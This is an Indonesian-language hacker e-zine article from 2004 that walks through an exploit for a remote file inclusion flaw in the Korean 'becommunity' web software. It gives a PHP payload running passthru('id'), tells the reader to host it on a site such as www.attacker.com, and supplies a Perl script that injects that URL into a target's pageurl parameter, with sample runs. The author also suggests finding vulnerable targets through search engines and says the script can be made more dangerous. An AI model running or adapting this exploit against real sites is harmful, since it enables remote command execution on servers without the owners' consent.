Issue‎ > ‎Issue 08‎ > ‎

018.txt

       

        ____________________   ___ ___ ________   
 	\_   _____/\_   ___ \ /   |   \\_____  \  
	 |    __)_ /    \  \//    ~    \/   |   \ 
	 |        \\     \___\    Y    /    |    \
	/_______  / \______  /\___|_  /\_______  /
	        \/         \/       \/         \/ 


					    .OR.ID
ECHO-ZINE RELEASE
       08

Author: y3dips || y3dips@echo.or.id 
Online @ www.echo.or.id :: http://ezine.echo.or.id

== Remote Command Execution EXPLOIT for Becommunity (Testing Only) ==

Pengantar
---------

Salam Berbagi, kali ini aku cuma coba coba membuatkan exploit untuk advisories
yang aku buat dengan script perl, ini cuma buat latihan ( biar gak lupa perl)
sekaligus memudahkan mengecek tanpa perlu browser, oh iya exploit ini juga cuma 
buat testing, alias gak bisa langsung pake (takut berbahaya)

Kalo temen temen yang ngerti programing n bisa meraciknya , maka script ini
dapat di buat berbahaya dan dapat digunakan untuk metode injection lainnya
alias tidak hanya untuk "becommunity" ini :)

Terakhir dari aku, semoga ini bermanfaat dan dapat digunakan sebaik baiknya untuk
pembelajaran bersama


C0re
----

Berikut potongan Advisories yang aku buat dan telah aku post ke berbagai situs
security dan juga di publish di echo.or.id


--[snip]--

/*taken from http://echo.or.id/adv/adv06-y3dips-2004.txt

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

E-market is commercial software made by korean company, includes shopping mall, 
community , e-crm (e-customer relationship management) , group buying ,weblog, 
auction, estimate sheet , and other features

web : http://www.nt.co.kr
      http://www.bbs2000.co.kr

Risk: very high ( ***** )
      most off all korean sites that handle e-shop , e-banking,... use this
      d**n software

else, no more info could get cause the site in korean language :(

---------------------------------------------------------------------------


Vulnerabilities:
~~~~~~~~~~~~~~~~

Remote command execution on 'becommunity' (modules that support by BBS e-market
professional)  makes insecure calls to the include() function of PHP (works 
on " pageurl= " functions )  which can allow the inclusion of remote files, 
and thereby the execution of arbitrary commands by remote user with  the web 
server user permissions, usually 'nobody' .


http://[TARGET]/becommunity/community/index.php?pageurl=[injection URL]

--[snip]--



C0ding Time
-----------

Yupe, sekarang mari kita racik exploitnya, pertama tama karena ini metode injection
maka kita tetap harus menyiapkan script php di url lain yang akan di eksekusi oleh
webserver target nantinya.

kita buat dulu file tes.txt yang isinya kurang lebih seperti ini

-- cut --

<?
echo "".passthru(' id ')."";
?>

-- cut --

simpan di situs yang anda miliki sehingga URL yang kita dapat adalah 
http://www.attacker.com/tes.txt

sekarang kita buat scriptnya,

--------------------------------------xplo.pl-------------------------------

#!/usr/bin/perl -w
 
# Remote Testing becommunity by y3dips [for testing only]
# Bug find by y3dips , published at http://echo.or.id/adv/adv06-y3dips-2004.txt

print "  * Remote Testing becommunity by y3dips *\n";

require LWP::UserAgent;

if(@ARGV == 2)
	{
      
$target= $ARGV[0];   #ambil inputan url target , eg : www.target.com
$xploit= $ARGV[1];   #ambil inputan url exploit ,eg:www.attacker.com/tes.txt

my $ua = LWP::UserAgent->new;
$ua->agent("MSIE/6.0 Windows");
$ua->timeout(10);
$ua->env_proxy;

$url = "http://$target/becommunity/community/index.php?pageurl=$xploit";

my $injek = $ua->get($url); 

	print "---------------------------------------------------\n";

	if ($injek->is_success) 
		{ print ("    $target Sepertinya Vulnerable\n");       } 
	else 	{ print ("    $target Sepertinya Tidak Vulnerable\n"); }

	print "---------------------------------------------------\n";

	}

else{
print "Gunakan: perl $0 [www.target] [xplo.txt]  \n"; #Help options
}  


#EOF y3dips(c)2004

-----------------------------------------eof--------------------------------

Sekarang kita coba jalankan exploitnya , sengaja aku cobakan di windows XP, 
dengan harapan teman teman lebih mudah menggunakannya (cukup gunakan Active
State Perl)

Mari kita mulai,

	Microsoft Windows XP [Version 5.1.2600]
	(C) Copyright 1985-2001 Microsoft Corp.

	C:\Documents and Settings\y3dips>f:

	F:\>perl xplo.pl
	  * Remote Testing becommunity by y3dips *
	Gunakan: perl xplo.pl [www.target] [xplo.txt]

Apabila ternyata gagal maka akan menampilkan,

	F:\>perl Xplo.pl www.dudul.com www.attacker.com/tes.txt
  	* Remote Testing becommunity by y3dips *
	---------------------------------------------------
	    www.dudul.com Sepertinya Tidak Vulnerable
	---------------------------------------------------


Sedangkan jika berhasil,


	F:\>perl Xplo.pl www.target.com www.attacker.com/tes.txt
  	* Remote Testing becommunity by y3dips *
	---------------------------------------------------
	    www.target.com Sepertinya Vulnerable
	---------------------------------------------------

berarti www.target.com kemungkinan besar masih bisa kita injeksi ^_*


Oh iya , untuk target silakan gunakan search engine :) , soalnya kalo sekalian
dilengkapi google bisa panjang banget, yang penting kan maksudnya ngerti (hehe
padahal aku aja yang males)
Oh ya, kalo anda berfikir kita kudu cari di google dulu, itukan pake browser 
juga, kenapa gak sekalian aja injek via url (hehehe, kamu benar :D) tetapi
kan tujuan kita belajar bikin exploits :) (pinter banget nge-lesnya kayak tukang
bajaj*, hue hue) 

*mungkin target yang vulnerable sudah sangat sedikit sekali dikarenakan advisories
ini sudah di publish pada awal september ke situs2 security (Eg:securityfocus.com)
sehingga kalo banyak yang gagal bukan kesalahan scriptnya, tetapi memang sudah 
di patch semua, dan pula artikel ini bukan untuk mencari yang vulnerable tetapi
agar teman teman dapat menyerap ilmunya :)


Penutup
-------

Semoga Artikel sederhana ini dapat menjadi berguna bagi kita semuanya, jika 
ada kata kata yang salah,aku minta maaf, pada ALLAH aku mohon ampun.


REference
---------

[1]. http://echo.or.id/adv/adv06-y3dips-2004.txt , Becommunity Example
[2]. e-book perl yang aku donlod gratis dan memberi banyak ilmu :
     - Advanced Perl programing
     - Learning Perl the HArd Way
     - Perl Programmer Reference Guide
     - Picking Up perl
[3]. Contoh script perl dari temen temen yang dah jago jago :)

*greetz to: 
	[echostaff : moby, comex, the_Day, z3r0byt3, K-159, c-a-s-e, S'to] 
        {ISICteam : yudhax, anton, balai_melayu, wisnu, biatch-X },

        anak anak newbie_hacker[at]yahoogroups.com , #e-c-h-o , #aikmel
	
	kirimkan kritik && saran ke y3dips[at]echo.or.id

	*/0x79/0x33/0x64/0x69/0x70/0x73/* (c)2004
Comments